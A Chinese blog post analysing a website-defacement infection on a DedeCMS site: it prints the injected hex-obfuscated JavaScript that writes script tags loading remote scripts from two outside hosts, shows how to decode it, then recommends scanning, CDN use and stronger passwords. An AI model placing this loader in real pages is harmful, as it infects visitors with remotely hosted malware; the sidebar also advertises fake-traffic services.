网站病毒“window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”]”解决办法

今天一个朋友的网站被挂马,病毒源如下:

  1. <script language="javascript">
  2. window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x67\x67\x39\x39\x39\x2e\x35\x31\x36\x36\x2e\x69\x6e\x66\x6f\/\x67\x67\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
  3. </script>
  4. <script language="javascript">
  5. window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x75\x73\x65\x72\x73\x33\x2e\x6a\x61\x62\x72\x79\x2e\x63\x6f\x6d\/\x67\x67\x69\x6e\x66\x6f\/\x69\x6e\x66\x6f\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
  6. </script>

 

网站病毒“window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]”

 

这是一段通过16进制编码的 JavaScript病毒,当你打开含有这段代码的页面时,那你的电脑立马中毒,好狠啊!

 

我把这代码通过 JavaScript 以下方法来解析一直,看下明文究竟是什么?

 <script>
       var str= "window[" + "\x64\x6f\x63\x75\x6d\x65\x6e\x74"+"]["+" \x77\x72\x69\x74\x65"+"]("+"\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x67\x67\x39\x39\x39\x2e\x35\x31\x36\x36\x2e\x69\x6e\x66\x6f\/\x67\x67\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e";
       alert(str);
</script>

结果如下:

JavaScript

 

 

我朋友程序用的是织梦dedecms做的网站,空间用的是:虚拟主机.香港空间。虽然说他曾经删除了这一段代码,但过一段时间,代码又会生成。说明网站还存在着后门的,并没有找到真正的病毒所在位置。

 

之所以出现这个问题,主要有以下几个原因:

1、服务商本身的问题。

2、网站程序漏洞太多。

3、账号密码过于简单,权限被人所掌控了。

 

解决办法:

 

一、检测、扫描网站

既然网站被挂马,网站存在病毒,我们首先要做的就是做一个网站检测,漏洞扫描......等,好知道哪些文件存在病毒?

 

推荐几个网站在线检测,在线扫描地址:

1、百度云观测:http://ce.baidu.com/

2、百度云扫描:https://sao.baidu.com/

3、360网站安全检测:http://webscan.360.cn/

4、第三方病毒扫描软件:https://www.fujieace.com/web/safety/virus.html

 

二、CDN防御

建议所有的网站都可以做一个CDN加速,CDN的作用不仅仅只是提升网站的速度,CDN它还可以隐藏自己网站真实IP;

防止一些:网页后门攻击、sql注入、信息泄露攻击、协议异常攻击、文件包含攻击、其它APP攻击、cc攻击、Ddos攻击......等等。

 

由于现在CDN平台很多,我就推荐我用过的两个CDN地址:

1、百度云加速:https://su.baidu.com/

2、360网站卫士:http://wangzhan.360.com/

3、cloudflare CDN:https://www.cloudflare.com/

 

三、密码提升

很多时候,网站被挂马是因为你的密码过于简单,别人破解了你的密码,拥有了你网站的权限。

如果你的网站没有被提权,是很难修改你的网页文件的。

 

密码一般这2个地方需要注意:

1、服务器或虚拟主机密码

2、网站后台密码

 

建议以上这两种地方,密码一定要非常的复杂,不要怕输入麻烦。我见过太多的人用dedecms后台的密码是:admin123类似的这种最常见的密码

 

注意:由于近几年云服务器的提升,建议大家用云服务器,云服务器除了你拥有最大的权限之外,而且它的安全性相对来说还是很高的。

上面所说的方法只是教大家如何去排查?如何防御?

 

推荐查看:

网站有病毒怎么解决?:https://www.fujieace.com/web/safety/virus.html

 

如果你的网站受到攻击、挂马......病毒等,欢迎随时可以联系我!可以给出良好的解决方案。

    A+
发布日期:2017年12月12日 15:44:26  所属分类:网站安全
最后更新时间:2019-12-22 20:55:00
评分: (2 票;平均数5.00 ;最高评分 5 ;用户总数2;总得分 10;百分比100.00)
付杰
刷流量 刷人气 刷点击 刷收藏 刷APP关键词
刷流量 刷人气 刷点击 刷收藏 刷APP关键词
  • ¥ 1.0元
  • 市场价:9.9元
PHP运行环境 wamp lamp lnmp 安装 配置 搭建
PHP运行环境 wamp lamp lnmp 安装 配置 搭建
  • ¥ 9.9元
  • 市场价:49.9元
wordpress站群服务 泛解析二级域名 二级目录站群
wordpress站群服务 泛解析二级域名 二级目录站群
  • ¥ 1999.9元
  • 市场价:4800元
服务器管理面板/主机控制面板“安装”服务
服务器管理面板/主机控制面板“安装”服务
  • ¥ 9.9元
  • 市场价:49.9元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

目前评论:1   其中:访客  0   博主  0

  1. 头像 A赵小顺 0

    我也遇到了这个问题,我按照你的方法,360没有检测出来,但是我用百度云扫描的时候,出现在好多的漏洞:高危有10个,中危12个,低危4个。漏洞等级包括:代码执行、CSRF、权限提升/绕过、DOS攻击、信息泄露。如下图:代码执行、CSRF、权限提升/绕过、DOS攻击、信息泄露漏洞